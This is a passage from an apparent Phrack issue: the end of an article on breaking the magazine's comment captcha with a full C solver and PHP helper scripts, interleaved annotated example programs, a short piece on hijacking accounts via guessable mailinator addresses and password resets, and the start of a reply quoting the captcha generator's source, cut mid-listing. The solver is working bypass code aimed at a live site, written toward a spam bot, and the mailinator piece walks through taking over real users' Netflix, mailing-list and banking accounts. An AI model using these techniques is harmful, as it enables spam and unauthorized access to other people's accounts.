turning them into white pixels.  This way we'll obtain an almost perfect
image.  The only issue is that there are some pixels which are as dark as
the ones which compose the characters, so we can't remove them with the
method explained above, we'll have to create something new.  My idea was to
"delete" all the pixels which have no blue pixels near them, so that the
few blue pixels which don't compose the letters will be deleted.  In
order to make the image cleaner I decided to delete all the pixels which
don't have at least 3 pixels near them.  You may have noticed that __COL
and __MIN are not defined in the source above, these are two numbers:

#define   __COL   0x50
#define   __MIN   4*3

__COL is a number I used when I delete all the light blue pixels, I use it
in this line:

if (captcha[i][d][0]>__COL && captcha[i][d][1]>__COL &&
    captcha[i][d][2]>__COL)

In a few words, if the pixel is lighter than #505050 then it will be
deleted (turned white). __MIN is the minimum number of conterminous pixels
under which the pixel is deleted.  The values were obtained after a few
attempts.

Perfect, now we have a piece of code which loads and clears a captcha.  Our
next goal is to split the characters so that we'll be able to recognise
each of them. Before doing all this work we'd better start working with 2
dimensional arrays, it'll make our work easier, so I've written some lines
which make this happen:

void make_bw () {
   int i,d;
   for (i=0;i<40;i++)
      for (d=0;d<120;d++)
         if (captcha[i][d][0]!=255)
            bw[i][d]=1;
         else
            bw[i][d]=0;
}

This simply transforms the image into a black and white one, so that we can
use a 2 dimensional array.  Now we can proceed splitting the letters.
In order to get the letters divided we are supposed to obtain two pixels
whose coordinates are the ones of the upper left corner and the lower right
corner. Once we have the coordinates of these two corners we'll be able to
cut a rectangle which contains a character.

Well, we're going to begin scanning the image from the left to the right,
column by column, and every time we find a black pixel in a column
which is preceded by an entire-white column, we'll know that in that column
a new character begins, while when we'll find an entire-white column
preceded by a column which contains at least one black pixel we'll know
that a character ends there.

Now, after this procedure is done we should have 12 different numbers which
represent the columns where each character begins and ends.  The next step
is to find the rows where the letter begins and ends, so that we can obtain
the coordinates of the pixels we need.  Let's call the column where the Xth
character begins CbX and the column where the Xth character ends CeX.  Now
we'll start our scan from the top to the bottom of the image to find the
upper coordinate and from the bottom to the top to find the lower
coordinate.

This time, of course, the scan will be done six times, using as limits the
columns between which each character is contained.

When the first row which contains a pixel is found (let's call this row
RbX) the same thing will be done to find the lower coordinate. The only
difference will be that the scan will begin from the bottom, that's done
this way because some characters (such as the 'j') are divided into two
parts, and if the scan was done only from the top to the bottom the result
would have been just a dot instead of the whole letter.

After having scanned the image from the bottom to the top we'll have
another row where the letter ends (or begins from the bottom), we'll call
this row ReX (of course we're talking about the Xth character).

Now we know which are the horizontal and vertical coordinates of the two
corners we're interested in (which are C1X(CbX,RbX) and C2X(CeX,ReX)), so
we can proceed by filling a (CeX-CbX)*(ReX-RbX) matrix which will contain
the Xth character. Obviously the matrix will be filled with the bits of the
Xth character.

void scan () {
   int i,d,k,j,c,coord[6][2][2];
   for (d=0,j=0,c=0;d<120;d++) {
      for (i=0,k=0;i<40;i++)
         if (bw[i][d])
            k=1;
      if (k && !j) {
         j=1;
         coord[c][0][0]=d;
      }
      else if (!k && j) {
         j=0;
         coord[c++][0][1]=d;
      }
   }
   for (c=0;c<6;c++) {
      coord[c][1][0]=-1;
      coord[c][1][1]=-1;
      for (i=0;(i<40 && coord[c][1][0]==-1);i++)
         for (d=coord[c][0][0];d<coord[c][0][1];d++)
            if (bw[i][d]) {
               coord[c][1][0]=i;
               break;
            }
      for (i=39;(i>=0 && coord[c][1][1]==-1);i--)
         for (d=coord[c][0][0];d<coord[c][0][1];d++)
            if (bw[i][d]) {
               coord[c][1][1]=i;
               break;
            }
      for (i=coord[c][1][0],j=0;i<=coord[c][1][1];i++,j++)
         for (d=coord[c][0][0],k=0;d<coord[c][0][1];d++,k++)
            chars[c][j][k]=bw[i][d];
      dim[c][0]=j;
      dim[c][1]=k;
   }
}
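
The column scan and the two row scans described above, written as one
bounded function and run on two constructed bitmaps (added example, not
darkjoker's code; struct box, segment() and both bitmaps are made up here).
Unlike scan(), it returns the number of runs it found instead of assuming
six, which is also the check a captcha author can run on generator output:
the "touching" bitmap yields two boxes for three glyphs.

```c
#include <stdio.h>

#define ROWS 8
#define COLS 24
#define MAXBOX 6   /* the article's captcha carries six characters */

/* One character cell: columns [col_begin, col_end), rows [row_top, row_bottom] */
struct box { int col_begin, col_end, row_top, row_bottom; };

/* Constructed sample: a 'j'-like glyph (dot above the stem), a 'p', an 'x' */
static const char *const SEPARATED[ROWS] = {
    "........................",
    "...#....................",
    "........................",
    "...#.....###......#...#.",
    "...#.....#.#.......#.#..",
    "...#.....###........#...",
    ".##......#.........#.#..",
    "........................",
};

/* Same glyphs, but the 'x' is moved left until it touches the 'p' */
static const char *const TOUCHING[ROWS] = {
    "........................",
    "...#....................",
    "........................",
    "...#.....####...#.......",
    "...#.....#.#.#.#........",
    "...#.....###..#.........",
    ".##......#...#.#........",
    "........................",
};

static int column_has_ink(const char *const img[], int rows, int c)
{
    for (int r = 0; r < rows; r++)
        if (img[r][c] == '#')
            return 1;
    return 0;
}

static int row_has_ink(const char *row, int c0, int c1)
{
    for (int c = c0; c < c1; c++)
        if (row[c] == '#')
            return 1;
    return 0;
}

/* Splits img into glyph boxes. Returns the number of boxes written to out[],
 * or -1 when the image holds more ink runs than max (out[] is never overrun). */
int segment(const char *const img[], int rows, int cols,
            struct box out[], int max)
{
    int n = 0, start = -1;

    /* c == cols acts as a virtual blank column, closing a run at the edge */
    for (int c = 0; c <= cols; c++) {
        int ink = c < cols && column_has_ink(img, rows, c);

        if (ink && start < 0) {
            start = c;                       /* blank -> ink: glyph begins */
        } else if (!ink && start >= 0) {     /* ink -> blank: glyph ends */
            if (n == max)
                return -1;
            struct box *b = &out[n++];
            b->col_begin = start;
            b->col_end = c;
            /* Top edge from above, bottom edge from below, so a detached
             * dot (as on 'j') stays inside the box */
            for (b->row_top = 0;
                 !row_has_ink(img[b->row_top], start, c); b->row_top++)
                ;
            for (b->row_bottom = rows - 1;
                 !row_has_ink(img[b->row_bottom], start, c); b->row_bottom--)
                ;
            start = -1;
        }
    }
    return n;
}

int main(void)
{
    struct box b[MAXBOX];
    const char *const *images[] = { SEPARATED, TOUCHING };
    const char *names[] = { "separated", "touching" };

    for (int k = 0; k < 2; k++) {
        int n = segment(images[k], ROWS, COLS, b, MAXBOX);
        printf("%s: %d boxes for 3 glyphs\n", names[k], n);
        for (int i = 0; i < n; i++)
            printf("  cols %d..%d rows %d..%d\n", b[i].col_begin,
                   b[i].col_end - 1, b[i].row_top, b[i].row_bottom);
    }
    return 0;
}
```
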

Ok, now, using this function we're going to obtain all the characters
split into an array of 2 dimensional arrays.  The next step will be the
most boring, because we're going to divide all the characters by hand, so
that the program, after our work, will be able to recognise all of them and
learn how each character is made.  Before that, we need a new directory
which will contain all the characters.  A simple 'mkdir chars' will do.
Now we have to fill the directory with the characters.  Here's a main
function whose goal is to divide all the captchas into characters and put
them in the chars/ directory.

int main () {
   int i,d,k,c,n;
   FILE *x;
   char path[32];
   for (n=0,k=0;n<200;n++) {
      load_image (n);
      clear_noise ();
      make_bw ();
      scan ();
      for (c=0;c<6;c++,k++) {
         sprintf (path,"chars/%d.ppm",k);
         x=fopen (path,"w");
         fprintf (x,"P1\n#asdasd\n\n%d %d\n",dim[c][1],dim[c][0]);
         for (i=0;i<dim[c][0];i++) {
            for (d=0;d<dim[c][1];d++)
               fprintf (x,"%d",chars[c][i][d]);
            fprintf (x,"\n");
         }
         fclose (x);
      }
   }
   return 0;
}

Very well, now the chars/ directory contains all the files we need.  Now
comes the part where the human is supposed to divide the characters into the
right directories.  To make this work faster I've used a simple PHP script
which helps a little:

<?php
$in=fopen ("php://stdin","r");
mkdir ("c");
for ($i=0;$i<26;$i++)
   mkdir ("c/".chr(ord('a')+$i));
for ($i=0;$i<10;$i++)
   mkdir ("c/".chr(ord('0')+$i));
for ($i=54;$i<1200;$i++) {
   echo $i.": ";
   $a = trim(fgets ($in,1024));
   if ($a!='.')
      system ("cp chars/{$i}.ppm c/{$a}/{$i}.ppm");
}
fclose ($in);
?>

I think there's nothing to be explained, it's just a few lines of code.
After the script is run and someone (me) enters all the data needed
we're going to have a c/ directory with some subdirectories in which there
are all the characters divided.

Some characters ('a','e','i','o','u','l','0','1') never appear, which means
that probably the author of the captcha decided not to include these
characters.

Anyway that's not a problem for us.  Now, we should work out a way to make
our program recognise a character.  My idea was to divide the image in 4
parts (horizontally), and then count the number of black (1) pixels in each
part, so that when we have an unknown character all our program will be
supposed to do is to count the number of black pixels for each part of the
image, and then search the character with the closest number of black
pixels.  I tried to do it but I hadn't taken into account that some
characters (such as 'q' and 'p') have a similar number of pixels for each
part, even though they're completely different.

After having realised that, I decided to use 8 parts to divide each
character: 4 parts horizontally, then each part is divided in other 2 parts
vertically.

Well, of course there's no way I could have done that by hand, and in fact
I've written a PHP script:

<?php
error_reporting (E_ALL ^ E_NOTICE);
$f = array (4,2,4/3,1);
$arr=array ('b','c','d','f','g','h','j','k','m','n','p','q','r','s','t',
            'v','w','x','y','z','2','3','4','5','6','7','8','9');
$h = array ();
for ($a=0;$a<count($arr);$a++) {
   $i = $arr[$a];
   $x = array ();
   $files = scandir ("c/{$i}");
   for ($d=0;$d<count($files);$d++) {
      if ($files[$d][0]!='.') { // Excludes '.' and '..'
         $lines=explode ("\n",file_get_contents ("c/{$i}/{$files[$d]}"));
         for ($k=0;$k<4;$k++)
            array_shift ($lines);
         array_pop ($lines);
         $j = count ($lines);
         $k = strlen ($lines[0]);
         $r=0;
         $h[$a] += $j;
         // Add this file's black pixels to the 8 zone totals
         for ($n=0;$n<4;$n++)
            for (;$r<floor ($j/$f[$n]);$r++) {
               for ($l=0;$l<floor($k/2);$l++)
                  $x[$n][0]+=$lines[$r][$l];
               for (;$l<floor($k);$l++)
                  $x[$n][1]+=$lines[$r][$l];
            }
      }
   }
   $h [$a] = round ($h[$a]/(count($files)-2));
   for ($n=0;$n<4;$n++) {
      $x[$n][0] = round ($x[$n][0]/(count($files)-2));
      $x[$n][1] = round ($x[$n][1]/(count($files)-2));
   }
   printf ("$i => %02d %02d %02d %02d / %02d %02d %02d %02d\n",$x[0][0],
           $x[1][0],$x[2][0],$x[3][0],$x[0][1],$x[1][1],$x[2][1],$x[3][1]);
}
for ($i=0;$i<count ($arr);$i++)
   echo "{$h[$i]}, ";

?>

It works out the average number of black pixels for each part.  Moreover it
also prints the average height of each character (I'm going to explain the
reason of this below).

A character such as a 'z' is divided this way:

01111  111110
11111  111111
11111  111111
01111  111111

00000  111110
00000  111110
00000  111100
00001  111100

00001  111000
00011  110000
00011  110000
00111  100000

00111  111110
01111  111111
01111  111111
00111  111110

So the numbers (of the black pixels) in this case will be:

18 23
 1 18
 8  8
14 22

Well, once taken all these numbers from each character the PHP script
written above works out the average numbers for each character.  In the
'z', for example, the average numbers are:

18 20
 3 15
11  7
17 20

Which are really close to the ones written above (at least, they're closer
than the ones of the other characters).  Now the last step is to do the
comparison between the character of the captcha we want our program to read
and the numbers we've stored.  To do so we first need to make the program
count the number of black pixels of a character, and save the numbers
somewhere so that it'll be possible to do the comparison.  read_pixels ()'s
aim is exactly to do that, using the same method used above in the PHP
script.

void read_pixels (int c) {
   int i,d,k,r;
   float arr[]={4,2,1.333333,1};
   memset (bpix,0,8*sizeof(int));
   for (k=0,i=0;k<4;k++) {
      for (;i<(int)(dim[c][0]/arr[k]);i++) {
         for (d=0;d<dim[c][1]/2;d++)
            bpix[k][0] += chars[c][i][d];
         for (;d<dim[c][1];d++)
            bpix[k][1] += chars[c][i][d];
      }
   }
}

The next step is to compare the numbers, that's what the cmp () function is
supposed to do:

char cmp (int c) {
   int i,d;
   int err,n,min,min_i;
   read_pixels (c);
   for (i=0,min=-1;i<28;i++) {
      n=abs(heights[i]-dim[c][0])*__HGT;
      for (d=0;d<4;d++) {
         n += abs(bpix[d][0]-table[i][0][d]);
         n += abs(bpix[d][1]-table[i][1][d]);
      }
      if (min>n || min<0) {
         min=n;
         min_i = i;
      }
   }
   return ch_list[min_i];
}

'table' is an array in which all the average numbers worked out before are
stored.  As you can see there's a final number (n) which is the sum of a
number obtained this way:

n += |x-y|

Where 'x' is the number of black pixels of each part of the character we
want to read, while 'y' is the average number of the character we're
comparing the character we want to read with.  The smaller the resulting
number is, the closer to that character.  I first thought that the
algorithm I used would have been good enough, but I soon realised that
there were too many "misunderstandings" while the program was trying to
read some characters (such as the 'y's, which were usually read as 'v's).
So I decided to make the final number also influenced by the height of the
character, so that a 'v' and a 'y' (which have different heights) can't be
misunderstood.

Before this change the program couldn't recognise 17 characters out of
1200.  Then, after some tests, I found that by adding the difference of the
heights times a constant, the results were better: 3 wrong characters out of
1200.

n = |x-y|*k

Where 'x' is the height of the character we want to read while 'y' is the
height of the character we're comparing the character we want to read
with.

The constant (k) was calculated by doing some attempts, and finally it was
given the value 1.5.  Now everything's ready, the last function I've
written is read_captcha () which will return the captcha's string.

char *read_captcha (char *file) {
   char *str;
   int i;
   str = malloc(7*sizeof(char));
   load_image (file);
   clear_noise ();
   make_bw ();
   scan ();
   for (i=0;i<6;i++)
      str[i]=cmp(i);
   str[i]=0;
   return str;
}
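
The zone comparison and the height term, carried through on the article's
own 'z' sample (added example, not darkjoker's code; the table, heights and
class order are copied from the full listing further down, while struct
feat, zone_counts(), score() and classify() are names chosen here). It
reports the runner-up class and the score margin with and without the
height term.

```c
#include <stdio.h>
#include <stdlib.h>

#define NCLASS 28
#define HGT 1.5   /* height weight, __HGT in the article's listing */

/* Class order, average heights and average zone counts as printed in the
 * article: TABLE[class][0 = left half, 1 = right half][band 0..3] */
static const char CLASSES[] = "bcdfghjkmnpqrstvwxyz23456789";
static const int HEIGHTS[NCLASS] = {
    23, 16, 23, 23, 22, 23, 29, 23, 16, 16, 22, 22, 16, 16,
    20, 16, 16, 16, 21, 16, 23, 24, 23, 23, 23, 23, 24, 24 };
static const int TABLE[NCLASS][2][4] = {
    {{18,28,26,28},{ 0,20,25,29}}, {{10,17,17,10},{21, 1, 1,20}},
    {{ 0,20,25,29},{18,31,26,31}}, {{10,24,18,17},{23,12, 6, 5}},
    {{21,25,20, 8},{28,25,29,27}}, {{18,28,25,22},{ 0,20,25,22}},
    {{ 1, 9, 0,14},{13,27,28,25}}, {{18,24,30,22},{ 0,15,21,23}},
    {{24,21,20,17},{21,25,24,20}}, {{17,18,16,14},{20,17,16,14}},
    {{27,25,29,22},{24,25,25, 0}}, {{25,25,24, 0},{27,25,29,22}},
    {{14,16,15,13},{19, 2, 0, 0}}, {{15,16, 2, 9},{12, 4,18,17}},
    {{15,20,15,12},{ 5,10, 5,19}}, {{13,17,15,11},{14,14,14,10}},
    {{ 9,17,20,13},{12,18,22,14}}, {{ 9,11,11,13},{12,13,13,12}},
    {{15,19,14,14},{16,20,15, 9}}, {{18, 3,11,17},{20,15, 7,20}},
    {{21, 4, 8,24},{21,26,19,24}}, {{16, 0, 6,24},{29,23,25,28}},
    {{ 5,12,23, 5},{23,24,32,24}}, {{23,25,10,20},{18,12,26,23}},
    {{ 3,21,28,24},{16,15,30,27}}, {{18, 1,11,20},{27,24,14, 3}},
    {{25,24,26,23},{28,26,28,28}}, {{20,27,16,16},{25,26,28, 9}} };

/* The 'z' sample printed in the article, 16 rows x 11 columns */
static const char *const Z_SAMPLE[16] = {
    "01111111110", "11111111111", "11111111111", "01111111111",
    "00000111110", "00000111110", "00000111100", "00001111100",
    "00001111000", "00011110000", "00011110000", "00111100000",
    "00111111110", "01111111111", "01111111111", "00111111110" };

struct feat { int left[4], right[4]; };

/* Counts black pixels in four horizontal bands, each split into a left
 * and a right half (columns below w/2 are "left"), like read_pixels() */
void zone_counts(const char *const glyph[], int h, int w, struct feat *f)
{
    int r = 0;
    for (int k = 0; k < 4; k++) {
        f->left[k] = f->right[k] = 0;
        for (; r < h * (k + 1) / 4; r++)
            for (int c = 0; c < w; c++) {
                if (glyph[r][c] != '1') continue;
                if (c < w / 2) f->left[k]++; else f->right[k]++;
            }
    }
}

/* Sum of |x-y| over the 8 zones, plus |height difference| * HGT truncated
 * to int (cmp() assigns that product to an int as well) */
int score(const struct feat *f, int h, int cls, int use_height)
{
    int n = use_height ? (int)(abs(HEIGHTS[cls] - h) * HGT) : 0;
    for (int k = 0; k < 4; k++)
        n += abs(f->left[k] - TABLE[cls][0][k])
           + abs(f->right[k] - TABLE[cls][1][k]);
    return n;
}

/* Finds the lowest and second-lowest scoring class and returns the margin
 * between their scores */
int classify(const struct feat *f, int h, int use_height,
             char *best, char *runner_up)
{
    int b = -1, s = -1, bs = 0, ss = 0;
    for (int i = 0; i < NCLASS; i++) {
        int n = score(f, h, i, use_height);
        if (b < 0 || n < bs) {
            s = b; ss = bs;
            b = i; bs = n;
        } else if (s < 0 || n < ss) {
            s = i; ss = n;
        }
    }
    *best = CLASSES[b];
    *runner_up = CLASSES[s];
    return ss - bs;
}

int main(void)
{
    struct feat f;
    char best, second;
    zone_counts(Z_SAMPLE, 16, 11, &f);
    for (int k = 0; k < 4; k++)
        printf("%2d %2d\n", f.left[k], f.right[k]);
    for (int use_height = 0; use_height <= 1; use_height++) {
        int margin = classify(&f, 16, use_height, &best, &second);
        printf("height term %s: '%c', runner-up '%c', margin %d\n",
               use_height ? "on" : "off", best, second, margin);
    }
    return 0;
}
```

For this sample the runner-up is '2' when only the zones are compared and
'n' once the height term is added.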

And.. Done :) Now we can make our program read a captcha without any
problem.  Now I should be supposed to code an entire spam bot, but, since
it requires some tests I think it wouldn't be good to post random comments
all around phrack, so my article finishes here.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define   __COL   80
#define   __MIN   4*3
#define   __HGT   1.5

unsigned char captcha[40][120][3];
unsigned char bw[40][120];
unsigned char chars[6][40][30];
int dim[6][2];
int bpix[4][2];
int heights[] = {
      23, 16, 23, 23, 22, 23, 29,
      23, 16, 16, 22, 22, 16, 16,
      20, 16, 16, 16, 21, 16, 23,
      24, 23, 23, 23, 23, 24, 24 };
char ch_list [] = "bcdfghjkmnpqrstvwxyz23456789";
int table [28][2][4]= {
         { {18, 28, 26, 28}, { 0, 20, 25, 29}},
         { {10, 17, 17, 10}, {21,  1,  1, 20}},
         { { 0, 20, 25, 29}, {18, 31, 26, 31}},
         { {10, 24, 18, 17}, {23, 12,  6,  5}},
         { {21, 25, 20,  8}, {28, 25, 29, 27}},
         { {18, 28, 25, 22}, { 0, 20, 25, 22}},
         { { 1,  9,  0, 14}, {13, 27, 28, 25}},
         { {18, 24, 30, 22}, { 0, 15, 21, 23}},
         { {24, 21, 20, 17}, {21, 25, 24, 20}},
         { {17, 18, 16, 14}, {20, 17, 16, 14}},
         { {27, 25, 29, 22}, {24, 25, 25,  0}},
         { {25, 25, 24,  0}, {27, 25, 29, 22}},
         { {14, 16, 15, 13}, {19,  2,  0,  0}},
         { {15, 16,  2,  9}, {12,  4, 18, 17}},
         { {15, 20, 15, 12}, { 5, 10,  5, 19}},
         { {13, 17, 15, 11}, {14, 14, 14, 10}},
         { { 9, 17, 20, 13}, {12, 18, 22, 14}},
         { { 9, 11, 11, 13}, {12, 13, 13, 12}},
         { {15, 19, 14, 14}, {16, 20, 15,  9}},
         { {18,  3, 11, 17}, {20, 15,  7, 20}},
         { {21,  4,  8, 24}, {21, 26, 19, 24}},
         { {16,  0,  6, 24}, {29, 23, 25, 28}},
         { { 5, 12, 23,  5}, {23, 24, 32, 24}},
         { {23, 25, 10, 20}, {18, 12, 26, 23}},
         { { 3, 21, 28, 24}, {16, 15, 30, 27}},
         { {18,  1, 11, 20}, {27, 24, 14,  3}},
         { {25, 24, 26, 23}, {28, 26, 28, 28}},
         { {20, 27, 16, 16}, {25, 26, 28,  9}} };

void clear () {
   int i,d,k;
   for (i=0;i<40;i++)
      for (d=0;d<120;d++)
         for (k=0;k<3;k++)
            captcha[i][d][k]=0;
   for (i=0;i<40;i++)
      for (d=0;d<120;d++)
         bw[i][d]=0;
   for (i=0;i<6;i++)
      for (d=0;d<40;d++)
         for (k=0;k<30;k++)
            chars[i][d][k]=0;
   for (i=0;i<6;i++)
      for (d=0;d<2;d++)
         dim[i][d]=0;
}

int numlen (int n) {
   char x[16];
   sprintf (x,"%d",n);
   return strlen(x);
}

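void load_image (char *img) {
   char line[1024];
   int n,i,d,k;
   FILE *fp;
   fp = fopen (img, "r");
   if (!fp) {
      perror (img);
      exit (1);
   }
   /* Skip the PPM header; pixel data follows the "255" maxval line */
   do {
      if (!fgets (line, sizeof(line),fp)) {
         fprintf (stderr,"%s: no PPM header found\n",img);
         exit (1);
      }
   } while (strcmp (line, "255\n"));
   i=0;
   d=0;
   k=0;
   /* 40 rows of 120 pixels, 3 colour values each */
   while (i!=40) {
      if (fscanf (fp,"%d",&n)!=1) {
         fprintf (stderr,"%s: truncated pixel data\n",img);
         exit (1);
      }
      captcha[i][d][k]=(unsigned char)n;
      k++;
      if (k==3) {
         k=0;
         if (d<119)
            d++;
         else {
            i++;
            d=0;
         }
      }
   }
   fclose (fp);
}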

void clear_noise () {
   int i,d,k,t,ti,td;
   char n[3];
   /* The borders are always white */
   for (i=0;i<40;i++)
      for (k=0;k<3;k++) {
         captcha[i][0][k]=255;
         captcha[i][119][k]=255;
      }
   for (d=0;d<120;d++)
      for (k=0;k<3;k++) {
         captcha[0][d][k]=255;
         captcha[39][d][k]=255;
      }
   /* Starts removing the noise */
   for (i=0;i<40;i++)
      for (d=0;d<120;d++)
         if (captcha[i][d][0]>__COL && captcha[i][d][1]>__COL &&
             captcha[i][d][2]>__COL)
            for (k=0;k<3;k++)
               captcha[i][d][k]=255;
   for (i=1;i<39;i++) {
      for (d=1;d<119;d++) {
         for (k=0,t=0;k<3;k++)
            if (captcha[i][d][k]!=255)
               t=1;
         if (t) {
            ti=i-1;
            td=d-1;
            for (k=0,t=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td++;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td++;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td=d-1;
            ti=i;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td+=2;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td=d-1;
            ti=i+1;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td++;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td++;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            if (t<__MIN)
               for (k=0;k<3;k++)
                  captcha[i][d][k]=255;
         }
      }
   }
}

void make_bw () {
   int i,d;
   for (i=0;i<40;i++)
      for (d=0;d<120;d++)
         if (captcha[i][d][0]!=255)
            bw[i][d]=1;
         else
            bw[i][d]=0;
}

void scan () {
   /* Zeroed, so a captcha with fewer than 6 runs leaves empty ranges */
   int i,d,k,j,c,coord[6][2][2]={{{0}}};
   /* Column scan: stop after 6 characters so coord[] can't be overrun */
   for (d=0,j=0,c=0;d<120 && c<6;d++) {
      for (i=0,k=0;i<40;i++)
         if (bw[i][d])
            k=1;
      if (k && !j) {
         j=1;
         coord[c][0][0]=d;
      }
      else if (!k && j) {
         j=0;
         coord[c++][0][1]=d;
      }
   }
   for (c=0;c<6;c++) {
      coord[c][1][0]=-1;
      coord[c][1][1]=-1;
      /* First row with a pixel, scanning from the top */
      for (i=0;(i<40 && coord[c][1][0]==-1);i++)
         for (d=coord[c][0][0];d<coord[c][0][1];d++)
            if (bw[i][d]) {
               coord[c][1][0]=i;
               break;
            }
      /* Last row with a pixel, scanning from the bottom */
      for (i=39;(i>=0 && coord[c][1][1]==-1);i--)
         for (d=coord[c][0][0];d<coord[c][0][1];d++)
            if (bw[i][d]) {
               coord[c][1][1]=i;
               break;
            }
      /* Copy the character; chars[c] is 40x30, so wider runs are cut */
      for (i=coord[c][1][0],j=0;i<=coord[c][1][1];i++,j++)
         for (d=coord[c][0][0],k=0;d<coord[c][0][1] && k<30;d++,k++)
            chars[c][j][k]=bw[i][d];
      dim[c][0]=j;
      dim[c][1]=k;
   }
}

void read_pixels (int c) {
   int i,d,k,r;
   float arr[]={4,2,1.333333,1};
   memset (bpix,0,8*sizeof(int));
   for (k=0,i=0;k<4;k++) {
      for (;i<(int)(dim[c][0]/arr[k]);i++) {
         for (d=0;d<(int)(dim[c][1]/2);d++)
            bpix[k][0] += chars[c][i][d];
         for (;d<dim[c][1];d++)
            bpix[k][1] += chars[c][i][d];
      }
   }
}

char cmp (int c) {
   int i,d;
   int err,n,min,min_i;
   read_pixels (c);
   for (i=0,min=-1;i<28;i++) {
      n=abs(heights[i]-dim[c][0])*__HGT;
      for (d=0;d<4;d++) {
         n += abs(bpix[d][0]-table[i][0][d]);
         n += abs(bpix[d][1]-table[i][1][d]);
      }
      if (min>n || min<0) {
         min=n;
         min_i = i;
      }
   }
   return ch_list[min_i];
}

char *read_captcha (char *file) {
   char *str;
   int i;
   str = malloc(7*sizeof(char));
   load_image (file);
   clear_noise ();
   make_bw ();
   scan ();
   for (i=0;i<6;i++)
      str[i]=cmp(i);
   str[i]=0;
   return str;
}

int main (int argc, char *argv[]) {
   printf ("%s\n",read_captcha ("test.ppm"));
   return 0;
}

Oh, if you want to have some fun and the staff is so kind as to leave
captcha.php (now captcha_old.php) you can run this PHP script:

<?php
file_put_contents ("a.jpg",file_get_contents
   ("http://www.phrack.com/captcha_old.php"));
system ("convert -compress None a.jpg test.ppm");
system ("./captcha");
?>

I'm done, thanks for reading :)!

               darkjoker - darkjoker93 _at_ gmail.com


|=[ 0x02 ]=---=[ The Dangers of Anonymous Email - DangerMouse ]=---------=|


In this digital world of online banking, and cyber relationships there
exists an epidemic. This is known simply as SPAM.
The war on spam has been costly, with casualties on both sides. However
finally mankind has developed the ultimate weapon to win the war...
email anonymizers!

Ok, so maybe this was a bit dramatic, but the truth is people are
getting desperate to rid themselves of the gigantic volumes of
unsolicited email which plagues their inbox daily. To combat this problem
many internet users are turning to email anonymizing services such as
Mailinator [1].

Sites like mailinator.com provide a domain where any keyword can be
created and appended as the username portion of an email address.
So for example, if you were to choose the username "trustno1", the email
address trustno1@mailinator.com could be used. Then the mailbox can be
accessed without a password at http://trustno1.mailinator.com. There is
no registration required to do this, and the email address can be created
at a whim. Obviously this can be used for a number of things. From a
hacker's perspective, it can be very useful to quickly create an anonymous
email address whenever one is needed. Especially one which can be checked
easily via a chain of proxies. Hell, combine it with an anonymous visa
gift card, and you've practically got a new identity.

For your typical spam-averse user, this can be an easy way to avoid
dealing with spam. One of the easiest ways to quickly gain an inbox
soaked in spam is to use your real email address to sign up to every
shiny new website which tickles your fancy. By creating a mailinator
account and submitting that instead, the user can visit the mailinator
website to retrieve the sign up email. Since this is not the user's
regular email account, any spam sent to it is inconsequential.

The flaw with this, however, is that your typical user just isn't
creative enough to work with a system designed this way. When creating
a fresh anonymous email account for a new website a typical user's
thought process goes something like this:

a) Look up at URL for name of site
b) Append said name to mailinator domain
c) ???
d) Profit

This opens up a nice way for the internet's more shady characters to
quickly gain access to almost any popular website via the commonly
implemented "password reset" functionality.

But wait, you say. Surely you jest? No one could be capable of such
silly behavior on the internet!

Alas... Apparently Mike & Debra could.

"An email with instructions on how to access Your Account has been sent to
you at netflix@mailinator.com"

"Netflix password request

"Dear Mike & Debra,
We understand you'd like to change your password. Just click here and
follow the prompts. And don't forget your password is case sensitive."

;) ?

At least security folk would be immune to this you say! There's no way
that gmail@mailinator.com would allow one to reset 2600LA's mailing list
password...

As you can imagine it's easy to wile away some time with possible
targets ranging from popular MMO's to banking websites. Just make sure
you use a proxy so you don't have to phone them up and give them their
password back... *cough*

Have fun! ;)

                       --DangerMouse <Phrack@mailinator.com>

P.S. With the rise in the popularity of social networking websites
mailinator felt the need to go all web 2.0 by including a fancy list of
people who "Like" mailinator on Facebook. AKA a handy target list for a
bored individual with scripting skillz.

References:
[1] Mailinator: http://www.mailinator.com
[2] Netflix: http://www.netflix.com


|=[ 0x03 ]=---=[ Captchas Round 2 - phpc0derZ@phrack.org ]=--------------=|

                     [ Or why we suck even more ;> ]

Let's face it, our laziness got us ;-) So what's the story behind our
captcha? Ironically enough, the original script comes from this URL:

http://www.white-hat-web-design.co.uk/articles/php-captcha.php <-- :)))))))

8<----------------------------------------------------------------------->8
<?php
session_start();

/*
* File: CaptchaSecurityImages.php
* Author: Simon Jarvis
* Copyright: 2006 Simon Jarvis
* Date: 03/08/06
* Updated: 07/02/07
* Requirements: PHP 4/5 with GD and FreeType libraries
* Link: http://www.white-hat-web-design.co.uk/articles/php-captcha.php
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details:
* http://www.gnu.org/licenses/gpl.html
*
*/


class CaptchaSecurityImages {

   var $font = 'monofont.ttf';

   function generateCode($characters)
   {
      /* list all possible characters, similar looking characters and
       * vowels have been removed */
     $possible = '23456789bcdfghjkmnpqrstvwxyz'; $code = ''; $i = 0;
     while ($i < $characters) {
       $code .= substr($possible, mt_rand(0, strlen($possible)-1),1);
       $i++;
     }
     return $code;
   }

   function CaptchaSecurityImages(
        $width='120',
        $height='40',
        $characters='6')
   {
      $code = $this->generateCode($characters);
      /* font size will be 75% of the image height */
      $font_size = $height * 0.75;
      $image = imagecreate($width, $height)
      or die('Cannot initialize new GD image stream');
      /* set the colours */
      $background_color = imagecolorallocate($image, 255, 255, 255);
      $text_color = imagecolorallocate($image, 20, 40, 100);
      $noise_color = imagecolorallocate($image, 100, 120, 180);
      /* generate random dots in background */
      for( $i=0; $i<($width*$height)/3; $i++ ) {
         imagefilledellipse($image,
